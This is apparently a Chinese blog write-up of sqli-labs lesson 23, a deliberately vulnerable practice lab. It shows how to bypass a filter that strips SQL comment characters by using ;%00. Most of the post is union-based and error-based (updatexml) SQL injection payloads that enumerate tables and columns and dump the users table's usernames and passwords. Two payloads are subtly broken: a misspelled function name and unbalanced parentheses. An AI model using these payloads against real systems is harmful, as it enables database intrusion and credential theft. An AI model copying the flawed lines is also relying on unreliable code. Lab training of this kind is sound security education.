Loading

sqli-labs lesson 23

less 23:

  这里通过验证?id=1'# 发现还是报错

  

  观察代码:

  

 

   这里涉及一个函数mixed preg_replace(mixed $pattern,mixed $replacement,mixed $subject)

  此函数执行一个正则表达式的搜索和替换,简单来讲就是搜索 subject中匹配patter部分 以replacement作为替换

  比如上面源代码中,就是在用户输入的id里搜索#和-- 并用空格替换

  所以我们的注释符要换成;%00

  执行:?id=1' ;%00  此时页面回显正常了。剩下步骤与less 1一致

  

 

   (因为国际惯例都知道是有3列,这里就不再演示)

  查询回显字段(注意id要找一个,不存在的值)

  这里解释一下为什么要找一个不存在的id值,大家观察下图的SQL语句,我们一共使用了两次select查询,

  但是只有一个数据可以输出,为了让我们自己构造语句的数据可以正常输出所以要使前一个select没有结果

  所以这里选择一个不存在的id值

  执行:?id=0' union select 1,2,3;%00

  

 

   查询数据库

  执行:?id=0' union select 1,2,database();%00

  

 

   查询数据库中所有表

  执行:?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database();%00

  

 

   查询users表中的所有字段

  执行: ?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' ;%00

  

 

   获取username和password中字段的值

  执行:?id=0' union select 1,2,group_concat(concat_ws('-',username,password)) from users;%00

  

 

  

  第二个方法:报错注入

  还是用到updatexml()函数

  执行:?id=1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1);%00

   

 

   查询数据库:

  执行:?id=1' and update(1,concat(0x7e,database(),0x7e),1);%00

  

 

   查询security数据库中的字段:

  执行:?id=1' and updatexml(1,concat(0x7e,(select (table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e),1);%00

  

 

   查询users表中的字段:

  执行:?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e),1);%00

  

 

   查询username字段的值

  执行:?id=1' and updatexml(1,concat(0x7e,select username from users limit 0,1),0x7e),1);%00

  password字段同理。

  

  

 

posted @ 2020-03-09 17:01  Zh1z3ven  阅读(217)  评论(0编辑  收藏  举报